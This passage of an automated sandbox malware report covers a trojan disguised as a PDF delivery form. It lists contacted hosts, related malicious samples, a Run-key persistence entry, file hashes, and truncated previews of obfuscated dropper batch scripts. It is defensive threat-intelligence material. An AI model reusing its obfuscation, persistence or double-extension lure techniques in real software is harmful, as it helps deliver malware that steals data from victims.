Lwnkboxd.PIF, 0000000B.00000003.1981506313.000000000096F000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            http://programania.com/en.htmDelivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, Lwnkboxd.PIF.0.drfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://programania.com/en.zipDelivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, Lwnkboxd.PIF.0.drfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1767809521.000000007ECB0000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1818324740.00000000216CE000.00000004.00000020.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1794843629.00000000024E2000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1818534654.0000000021806000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1820675852.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1767660498.000000007ED13000.00000004.00001000.00020000.00000000.sdmp, Lwnkboxd.PIF, 00000005.00000002.1980024689.000000002076F000.00000004.00001000.00020000.00000000.sdmp, Lwnkboxd.PIF, 00000005.00000002.2029094698.0000000021090000.00000004.00000020.00020000.00000000.sdmp, Lwnkboxd.PIF, 0000000B.00000003.1981506313.0000000000911000.00000004.00000020.00020000.00000000.sdmp, Lwnkboxd.PIF, 0000000B.00000003.1981506313.000000000096F000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              http://ocsp.sectigo.com0Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1767809521.000000007ECB0000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1818324740.00000000216CE000.00000004.00000020.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1794843629.00000000024E2000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1818534654.0000000021806000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1820675852.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1767660498.000000007ED13000.00000004.00001000.00020000.00000000.sdmp, Lwnkboxd.PIF, 00000005.00000002.1980024689.000000002076F000.00000004.00001000.00020000.00000000.sdmp, Lwnkboxd.PIF, 00000005.00000002.2029094698.0000000021090000.00000004.00000020.00020000.00000000.sdmp, Lwnkboxd.PIF, 0000000B.00000003.1981506313.0000000000911000.00000004.00000020.00020000.00000000.sdmp, Lwnkboxd.PIF, 0000000B.00000003.1981506313.000000000096F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                http://programania.com/en_source.zipDelivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, Lwnkboxd.PIF.0.drfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://drive.google.com/Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1774111386.000000000069E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://programania.com/index_ru.htmDelivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000000.1670631490.000000000055C000.00000002.00000001.01000000.00000003.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1673538972.000000007F312000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1770113864.0000000021B64000.00000004.00000020.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1794843629.0000000002579000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1673538972.000000007F1C8000.00000004.00001000.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchproquota.exe, 00000010.00000002.2457969749.000000000776C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1767809521.000000007ECB0000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1818324740.00000000216CE000.00000004.00000020.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1794843629.00000000024E2000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1818534654.0000000021806000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1820675852.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1767660498.000000007ED13000.00000004.00001000.00020000.00000000.sdmp, Lwnkboxd.PIF, 00000005.00000002.1980024689.000000002076F000.00000004.00001000.00020000.00000000.sdmp, Lwnkboxd.PIF, 00000005.00000002.2029094698.0000000021090000.00000004.00000020.00020000.00000000.sdmp, Lwnkboxd.PIF, 0000000B.00000003.1981506313.0000000000911000.00000004.00000020.00020000.00000000.sdmp, Lwnkboxd.PIF, 0000000B.00000003.1981506313.000000000096F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=proquota.exe, 00000010.00000002.2457969749.000000000776C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=proquota.exe, 00000010.00000002.2457969749.000000000776C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1767809521.000000007ECB0000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1818324740.00000000216CE000.00000004.00000020.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1794843629.00000000024E2000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1818534654.0000000021806000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1820675852.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1767660498.000000007ED13000.00000004.00001000.00020000.00000000.sdmp, Lwnkboxd.PIF, 00000005.00000002.1980024689.000000002076F000.00000004.00001000.00020000.00000000.sdmp, Lwnkboxd.PIF, 00000005.00000002.2029094698.0000000021090000.00000004.00000020.00020000.00000000.sdmp, Lwnkboxd.PIF, 0000000B.00000003.1981506313.0000000000911000.00000004.00000020.00020000.00000000.sdmp, Lwnkboxd.PIF, 0000000B.00000003.1981506313.000000000096F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://www.ecosia.org/newtab/proquota.exe, 00000010.00000002.2457969749.000000000776C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=proquota.exe, 00000010.00000002.2457969749.000000000776C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://ocsp.sectigo.com0CDelivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1767809521.000000007ECB0000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1818324740.00000000216CE000.00000004.00000020.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1794843629.00000000024E2000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1818534654.0000000021806000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1820675852.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1767660498.000000007ED13000.00000004.00001000.00020000.00000000.sdmp, Lwnkboxd.PIF, 00000005.00000002.1980024689.000000002076F000.00000004.00001000.00020000.00000000.sdmp, Lwnkboxd.PIF, 00000005.00000002.2029094698.0000000021090000.00000004.00000020.00020000.00000000.sdmp, Lwnkboxd.PIF, 0000000B.00000003.1981506313.0000000000911000.00000004.00000020.00020000.00000000.sdmp, Lwnkboxd.PIF, 0000000B.00000003.1981506313.000000000096F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://www.pmail.com0Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1818945720.0000000021E70000.00000004.00000020.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1772442909.000000007EBFA000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1767809521.000000007ECB0000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1794843629.000000000251E000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1818534654.0000000021806000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1820675852.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1767660498.000000007ED13000.00000004.00001000.00020000.00000000.sdmp, Lwnkboxd.PIF, 00000005.00000002.1980024689.0000000020715000.00000004.00001000.00020000.00000000.sdmp, proquota.exe, 00000010.00000002.2455010423.0000000000779000.00000004.00000020.00020000.00000000.sdmp, proquota.exe, 00000010.00000002.2456357700.0000000004ACC000.00000004.10000000.00040000.00000000.sdmp, IzFuULsBXSkS.exe, 00000013.00000000.2282511717.0000000002BFC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000014.00000002.2915059830.0000000036E6C000.00000004.80000000.00040000.00000000.sdmp, dxobknwL.pif.0.drfalse
                                                                    		high

                                                                    World Map of Contacted IPs

                                                                    • No. of IPs < 25%
                                                                    • 25% < No. of IPs < 50%
                                                                    • 50% < No. of IPs < 75%
                                                                    • 75% < No. of IPs

                                                                    Public IPs

                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                    172.217.19.238
                                                                    		drive.google.comUnited States
                                                                    		15169GOOGLEUSfalse
                                                                    199.59.243.227
                                                                    		94950.bodis.comUnited States
                                                                    		395082BODIS-NJUSfalse
                                                                    142.250.181.97
                                                                    		drive.usercontent.google.comUnited States
                                                                    		15169GOOGLEUSfalse

                                                                    General Information

                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                    Analysis ID:1580843
                                                                    Start date and time:2024-12-26 11:51:07 +01:00
                                                                    Joe Sandbox product:CloudBasic
                                                                    Overall analysis duration:0h 8m 32s
                                                                    Hypervisor based Inspection enabled:false
                                                                    Report type:full
                                                                    Cookbook file name:default.jbs
                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                    Number of analysed new started processes analysed:19
                                                                    Number of new started drivers analysed:0
                                                                    Number of existing processes analysed:0
                                                                    Number of existing drivers analysed:0
                                                                    Number of injected processes analysed:3
                                                                    Technologies:
                                                                    • HCA enabled
                                                                    • EGA enabled
                                                                    • AMSI enabled
                                                                    Analysis Mode:default
                                                                    Analysis stop reason:Timeout
                                                                    Sample name:Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe
                                                                    Detection:MAL
                                                                    Classification:mal100.troj.spyw.evad.winEXE@27/8@3/3
                                                                    EGA Information:
                                                                    • Successful, ratio: 100%
                                                                    HCA Information:
                                                                    • Successful, ratio: 98%
                                                                    • Number of executed functions: 69
                                                                    • Number of non-executed functions: 250
                                                                    Cookbook Comments:
                                                                    • Found application associated with file extension: .exe

                                                                    Warnings

                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                    • Excluded IPs from analysis (whitelisted): 52.149.20.212, 13.107.246.63
                                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                    Simulations

                                                                    Behavior and APIs

                                                                    TimeTypeDescription
                                                                    05:51:58API Interceptor2x Sleep call for process: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe modified
                                                                    05:52:19API Interceptor4x Sleep call for process: Lwnkboxd.PIF modified
                                                                    10:52:10AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Lwnkboxd C:\Users\Public\Lwnkboxd.url
                                                                    10:52:18AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Lwnkboxd C:\Users\Public\Lwnkboxd.url

                                                                    Joe Sandbox View / Context

                                                                    IPs

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    199.59.243.227SW_48912.scr.exeGet hashmaliciousFormBookBrowse
                                                                    • www.1337street.shop/0gdu/
                                                                    rQuotation.exeGet hashmaliciousFormBookBrowse
                                                                    • www.sob.rip/w4ic/?4v7=yS69adElfH9iGuX+6qGjDo1pzUaFwG2aAiZ0CSeLQ3WEURd5D9NqWLH4alYcst9SwKAkCKhjPGbctdXA/FIYLK0HEa0UfTU4rNsaCNMRH49YQwEuYtvnEXw=&pRel=chN0
                                                                    https://tfsroanoke.com/home/tfs/public_html/new/ckfinder/userfiles/files/12719803849.pdfGet hashmaliciousPDFPhishBrowse
                                                                    • ww25.crewmak.ru/_tr
                                                                    htkeUc1zJ0.exeGet hashmaliciousUnknownBrowse
                                                                    • ww7.cutit.org/oxgBR?usid=27&utid=9975975645
                                                                    DHL.exeGet hashmaliciousFormBookBrowse
                                                                    • www.969-usedcar02.shop/cfcv/
                                                                    z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeGet hashmaliciousFormBookBrowse
                                                                    • www.sorket.tech/ul4e/
                                                                    236236236.elfGet hashmaliciousUnknownBrowse
                                                                    • survey-smiles.com/
                                                                    HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                    • ww7.przvgke.biz/aikqer?usid=23&utid=8062768193
                                                                    Payment Copy #190922-001.exeGet hashmaliciousFormBookBrowse
                                                                    • www.deadshoy.tech/0sq9/
                                                                    new.exeGet hashmaliciousFormBookBrowse
                                                                    • www.vavada-official.buzz/emhd/

                                                                    Domains

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    94950.bodis.comSW_48912.scr.exeGet hashmaliciousFormBookBrowse
                                                                    • 199.59.243.227
                                                                    rQuotation.exeGet hashmaliciousFormBookBrowse
                                                                    • 199.59.243.227
                                                                    Payment Copy #190922-001.exeGet hashmaliciousFormBookBrowse
                                                                    • 199.59.243.227
                                                                    new.exeGet hashmaliciousFormBookBrowse
                                                                    • 199.59.243.227
                                                                    PO 1202495088.exeGet hashmaliciousFormBookBrowse
                                                                    • 199.59.243.227
                                                                    ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exeGet hashmaliciousFormBookBrowse
                                                                    • 199.59.243.227
                                                                    SHIPPING DOC.exeGet hashmaliciousFormBookBrowse
                                                                    • 199.59.243.227
                                                                    Purchase order MIPO2425110032.exeGet hashmaliciousFormBookBrowse
                                                                    • 199.59.243.227
                                                                    PI916810.exeGet hashmaliciousFormBookBrowse
                                                                    • 199.59.243.227
                                                                    SALES ORDER875.exeGet hashmaliciousFormBookBrowse
                                                                    • 199.59.243.227

                                                                    ASNs

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    BODIS-NJUSSW_48912.scr.exeGet hashmaliciousFormBookBrowse
                                                                    • 199.59.243.227
                                                                    rQuotation.exeGet hashmaliciousFormBookBrowse
                                                                    • 199.59.243.227
                                                                    https://tfsroanoke.com/home/tfs/public_html/new/ckfinder/userfiles/files/12719803849.pdfGet hashmaliciousPDFPhishBrowse
                                                                    • 199.59.243.205
                                                                    Tbconsulting Company Guidelines Employee Handbook.docxGet hashmaliciousUnknownBrowse
                                                                    • 199.59.243.227
                                                                    htkeUc1zJ0.exeGet hashmaliciousUnknownBrowse
                                                                    • 199.59.243.227
                                                                    DHL.exeGet hashmaliciousFormBookBrowse
                                                                    • 199.59.243.227
                                                                    z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeGet hashmaliciousFormBookBrowse
                                                                    • 199.59.243.227
                                                                    Tbconsulting Company Guidelines Employee Handbook.docxGet hashmaliciousUnknownBrowse
                                                                    • 199.59.243.205
                                                                    HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                    • 199.59.243.227
                                                                    Payment Copy #190922-001.exeGet hashmaliciousFormBookBrowse
                                                                    • 199.59.243.227

                                                                    JA3 Fingerprints

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    a0e9f5d64349fb13191bc781f81f42e1ciwa.mp4.htaGet hashmaliciousLummaC, PureLog StealerBrowse
                                                                    • 142.250.181.97
                                                                    • 172.217.19.238
                                                                    Set-up.exeGet hashmaliciousLummaCBrowse
                                                                    • 142.250.181.97
                                                                    • 172.217.19.238
                                                                    setup.exeGet hashmaliciousLummaCBrowse
                                                                    • 142.250.181.97
                                                                    • 172.217.19.238
                                                                    Set-up.exeGet hashmaliciousLummaC StealerBrowse
                                                                    • 142.250.181.97
                                                                    • 172.217.19.238
                                                                    SET_UP.exeGet hashmaliciousLummaCBrowse
                                                                    • 142.250.181.97
                                                                    • 172.217.19.238
                                                                    00000.ps1Get hashmaliciousLummaCBrowse
                                                                    • 142.250.181.97
                                                                    • 172.217.19.238
                                                                    123.ps1Get hashmaliciousLummaCBrowse
                                                                    • 142.250.181.97
                                                                    • 172.217.19.238
                                                                    Setup.exeGet hashmaliciousLummaCBrowse
                                                                    • 142.250.181.97
                                                                    • 172.217.19.238
                                                                    vce exam simulator 2.2.1 crackk.exeGet hashmaliciousLummaCBrowse
                                                                    • 142.250.181.97
                                                                    • 172.217.19.238

                                                                    Dropped Files

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    C:\Users\Public\Libraries\dxobknwL.pifRTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                      Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                        F.O Pump Istek,Docx.batGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                          D.G Governor Istek,Docx.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                            qDKTsL1y44.exeGet hashmaliciousDBatLoaderBrowse
                                                                              PRODUCT.batGet hashmaliciousAveMaria, DBatLoader, UACMeBrowse
                                                                                purchaseorder.batGet hashmaliciousAveMaria, DBatLoader, UACMeBrowse
                                                                                  PO11550.exeGet hashmaliciousAveMaria, DBatLoader, UACMeBrowse
                                                                                    SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeGet hashmaliciousAgentTesla, DBatLoader, RedLineBrowse
                                                                                      PCMNil7wkU.exeGet hashmaliciousAgentTesla, AsyncRAT, DBatLoader, RedLineBrowse

                                                                                        Created / dropped Files

                                                                                        C:\Users\Public\Libraries\FX.cmd

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe
                                                                                        File Type:DOS batch file, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):8556
                                                                                        Entropy (8bit):4.623706637784657
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:dSSQx41VVrTlS2owuuWTtkY16Wdhdsu0mYKDCIfYaYuX1fcDuy:Vrhgwuua5vdnQaCIVJF6uy
                                                                                        MD5:60CD0BE570DECD49E4798554639A05AE
                                                                                        SHA1:BD7BED69D9AB9A20B5263D74921C453F38477BCB
                                                                                        SHA-256:CA6A6C849496453990BECEEF8C192D90908C0C615FA0A1D01BCD464BAD6966A5
                                                                                        SHA-512:AB3DBDB4ED95A0CB4072B23DD241149F48ECFF8A69F16D81648E825D9D81A55954E5DD9BC46D3D7408421DF30C901B9AD1385D1E70793FA8D715C86C9E800C57
                                                                                        Malicious:true
                                                                                        Preview:@echo off..set "MJtc=Iet "..@%.r.......%e%...%c%...r....%h%.....%o%........% % .....%o%...%f%.o.%f%......%..s%.......%e%.%t%.. .....% %.rr.. .%"%...%w%......%o%...o..%t%r.....%c%....%=%... . .%s%...... %e%....%t%....% %........ %"% o...%..%wotc%"%.%n% r .%O%...%P%.. ..%t%.%=%...... o..%=%......%"%....r...%..%wotc%"aeeYdDdanR%nOPt%s://"..%wotc%"%..........%a%.%e%......%e%.r..%Y%..%d%.....r....%D%.. %d% ... .%a%.. ...%n%.. ..%R%........%%nOPt%s%...... .%:%.. %/%....%/%r......%"%.....r.%..%wotc%"%...... ...%U%.o..%g%.r.%

                                                                                        C:\Users\Public\Libraries\Lwnkboxd

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):615385
                                                                                        Entropy (8bit):7.389357877237351
                                                                                        Encrypted:false
                                                                                        SSDEEP:12288:da/bSw1ous1eA4JIFIZNbBXgNIMn0h8OYRBl3VjUcSxxi1nHW8:da/JjR6yZNu0fYXvjUtxs1nZ
                                                                                        MD5:020E7647D955DF47ED1CA4330FD7B8DE
                                                                                        SHA1:A6B089F6527AC18AEE1F98F0984C7AEA1370B2CF
                                                                                        SHA-256:17EDBFA3B0F39EAF85103A61B82F9B68EEEDC4C92A20438940F995FA49608461
                                                                                        SHA-512:6CBA9BDBE5770C3EFC999D3988A2CA21D561EDFE64A1433CB82475AC2F5A9B3A036E255E56DA73CA70BF9F209197AE8F74A039BEA9C4DFBC4687F8B39CB58D5D
                                                                                        Malicious:true
                                                                                        Preview:...Y#..K$...$..!!!......!!"..& ...!&....Y#..KW$....%..&'...Y#..K.......................~............................~............................~............................~............................~............................~............................~............................~............................~............................~............................~............................~............................~............................~............................~............................~............................~............................~............................~............................~............................~............................~............................~............................~............................~............................~............................~................... ..G...O.....\q..b....b$."..\z.k.H.?.@P.m...JW.efxyl.xs.....3.E)M...Q}Uo...q^b...>6..p.f[.%_5..z...az..h.^.Y.......F.+..........FW/z.=

                                                                                        C:\Users\Public\Libraries\Lwnkboxd.PIF

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe
                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):1444352
                                                                                        Entropy (8bit):6.739262242253885
                                                                                        Encrypted:false
                                                                                        SSDEEP:24576:Gae+1jKFTxeZhauIhY8oYsO0COg21wu0L8U:Ge16FeGrI/g21W8U
                                                                                        MD5:9E67C73F86B034D009280AB03DB20124
                                                                                        SHA1:ABA6A0DE8E85CF5A84C0A158D3908189ECF29330
                                                                                        SHA-256:B55CF6B5EC66FDC4DBBECC4E2F7698549964EC234BD0B55D057527D59D91147D
                                                                                        SHA-512:22ECFA7F450A2EDBDB964A900524069F9B12804D691D204EDA66EFB6C2EB212E8E81229CC5E27626EA699749A72107ADB45FCE5A7AE4DD21F7FE4D4EA33AB9FF
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 63%
                                                                                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*............................\7.......@....@..............................................@...............................+..............................\...................................................4................................text............................... ..`.itext.......0...................... ..`.data....!...@..."... ..............@....bss....,7...p.......B...................idata...+.......,...B..............@....tls....@............n...................rdata...............n..............@..@.reloc..\............p..............@..B.rsrc...............................@..@....................................@..@................................................................................................

                                                                                        C:\Users\Public\Libraries\NEO.cmd

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe
                                                                                        File Type:DOS batch file, Unicode text, UTF-8 text, with very long lines (420), with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):46543
                                                                                        Entropy (8bit):4.705001079878445
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:Ud6T6yIssKMyD/LgZ0+9Z2noufIBUEADZQp2H8ZLq:UdQFIssKMyjL4X2T8UbZT
                                                                                        MD5:637A66953F03B084808934ED7DF7192F
                                                                                        SHA1:D3AE40DFF4894972A141A631900BD3BB8C441696
                                                                                        SHA-256:41E1F89A5F96F94C2C021FBC08EA1A10EA30DAEA62492F46A7F763385F95EC20
                                                                                        SHA-512:2A0FEDD85722A2701D57AA751D5ACAA36BBD31778E5D2B51A5A1B21A687B9261F4685FD12E894244EA80B194C76E722B13433AD9B649625D2BC2DB4365991EA3
                                                                                        Malicious:false
                                                                                        Preview:@echo off..set "EPD=sPDet "..@%...... or%e%.........%c%......%h%.........o%o%.or......% %.o.ro...%o%.%f%...r.....%f%....r....%..s%. %e%.....%t% % % rrr....%"%.....%E%....%J%.. ....%O%.%h% .......%=%........%s%.. ..%e%....%t%....% %...o...%"%.%..%EJOh%"%.%r% %H%..%C%........%N%....o ....%=%..........%=% .%"%..%..%EJOh%"%.....%K%.%z%..r%j%........%L%..%c%. o.......%f%. o..%x%.%X%.........r%V%.%J%.....%%rHCN%k%.... ...%"%........%..%EJOh%"%.o.....%a%or%g%..o.... ..%u% ..%P%.....o...%X%.. .......%c% .....%U%.%I%. .

                                                                                        C:\Users\Public\Libraries\dxobknwL.pif

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe
                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):175800
                                                                                        Entropy (8bit):6.631791793070417
                                                                                        Encrypted:false
                                                                                        SSDEEP:3072:qjyOm0e6/bIhbuwxlEb1MpG+xUEyAn0fYuDGOpPXFZ7on+gUxloDMq:qjyl6ebX45OG+xUEWfYUGOpPXFZ7on+G
                                                                                        MD5:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                                        SHA1:2A001C30BA79A19CEAF6A09C3567C70311760AA4
                                                                                        SHA-256:BDFA725EC2A2C8EA5861D9B4C2F608E631A183FCA7916C1E07A28B656CC8EC0C
                                                                                        SHA-512:C7F5BAAD732424B975A426867D3D8B5424AA830AA172ED0FF0EF630070BF2B4213750E123A36D8C5A741E22D3999CA1D7E77C62D4B77D6295B20A38114B7843C
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 3%
                                                                                        Joe Sandbox View:
                                                                                        • Filename: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, Detection: malicious, Browse
                                                                                        • Filename: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, Detection: malicious, Browse
                                                                                        • Filename: F.O Pump Istek,Docx.bat, Detection: malicious, Browse
